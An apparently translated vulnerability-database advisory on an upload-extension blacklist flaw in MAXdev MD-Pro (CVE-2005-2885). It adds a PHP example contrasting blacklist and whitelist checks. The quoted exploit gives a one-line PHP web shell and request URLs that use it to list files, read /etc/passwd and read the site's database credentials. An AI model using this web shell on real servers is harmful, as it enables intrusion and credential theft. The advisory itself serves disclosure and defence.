MAXdev MD-Pro Downloads Page Arbitrary Command Execution Vulnerability

Vulnerability ID: 1109053
Vulnerability type: Design error
Published: 2005-09-06
Updated: 2005-10-20
CVE ID: CVE-2005-2885
CNNVD-ID: CNNVD-200509-126
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/26225
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-126
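|Vulnerability details
MAXdev MD-Pro is a CMS, an application for displaying and managing a website's content. MD-Pro makes website administration simple yet powerful. The Downloads page in MAXdev MD-Pro 1.0.73, and possibly earlier versions, uses an incomplete blacklist to check for dangerous file extensions. A remote attacker can therefore bypass the extension check by uploading a file with a different extension, for example a .inc file, and execute arbitrary commands.
|Exploit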
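
The difference between the two designs, as an added example that is not MD-Pro's code and not part of the original advisory: a constructed blacklist check beside a whitelist check. The function names, both extension lists and the sample file names are assumptions made for illustration.

```php
<?php
// Added illustration; not MD-Pro source code. All names here are hypothetical.

// Constructed blacklist of the kind the advisory describes: anything not listed passes.
const DENIED_EXTENSIONS = ['php', 'php3', 'phtml', 'pl', 'cgi'];

// Assumed whitelist for a download area; restrict it to what the site really serves.
const ALLOWED_EXTENSIONS = ['zip', 'pdf', 'txt', 'png', 'jpg'];

/** Flawed design: rejects only extensions someone remembered to list. */
function blacklist_accepts(string $filename): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, DENIED_EXTENSIONS, true);
}

/** Hardened design: one name part, one extension, and the extension must be listed. */
function whitelist_accepts(string $filename): bool
{
    // Rejects path separators, double extensions ("a.php.zip") and names without an extension.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})\z/', $filename, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ALLOWED_EXTENSIONS, true);
}

/** Server-chosen storage name, so the uploader never controls the on-disk file name. */
function storage_name(string $filename): string
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names, checked against both designs.
foreach (['notes.inc', 'tool.php', 'archive.php.zip', 'manual.pdf'] as $name) {
    $stored = whitelist_accepts($name) ? storage_name($name) : '-';
    printf(
        "%-16s blacklist=%-6s whitelist=%-6s stored_as=%s\n",
        $name,
        blacklist_accepts($name) ? 'accept' : 'reject',
        whitelist_accepts($name) ? 'accept' : 'reject',
        $stored
    );
}
```

Only the whitelist rejects `notes.inc`; the blacklist lets it through because `.inc` was never listed.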
source: http://www.securityfocus.com/bid/14750/info

MAXdev MD-Pro is prone to an arbitrary remote file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

This issue is due to a design error in the application, which uses a blacklist technique that states which file extensions cannot be uploaded, rather than a whitelist design that would permit only certain file extensions. An attacker can exploit this vulnerability to upload arbitrary files, including malicious scripts, and possibly execute the script on the affected server.

This can ultimately facilitate unauthorized access in the context of the Web server. 

Upload a file with a .inc extension containing this code:

<?php
error_reporting(0);
system($_GET[c]);
?>

Now list directories with:
http://www.example.com/upload/dl/[filename].inc?c=ls%20-la

View the /etc/passwd file:
http://www.example.com/upload/dl/[filename].inc?c=cat%20/etc/passwd

View the database username and password:
http://www.example.com/upload/dl/[filename].inc?c=cat%20.././config/md-config.php
|References

Source: XF
Name: mdpro-extension-file-upload(22199)
Link: http://xforce.iss.net/xforce/xfdb/22199
Source: BID
Name: 14750
Link: http://www.securityfocus.com/bid/14750
Source: SECUNIA
Name: 16731
Link: http://secunia.com/advisories/16731/
Source: BUGTRAQ
Name: 20050906 MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution / cross site scripting / path disclosure
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112603835317458&w=2
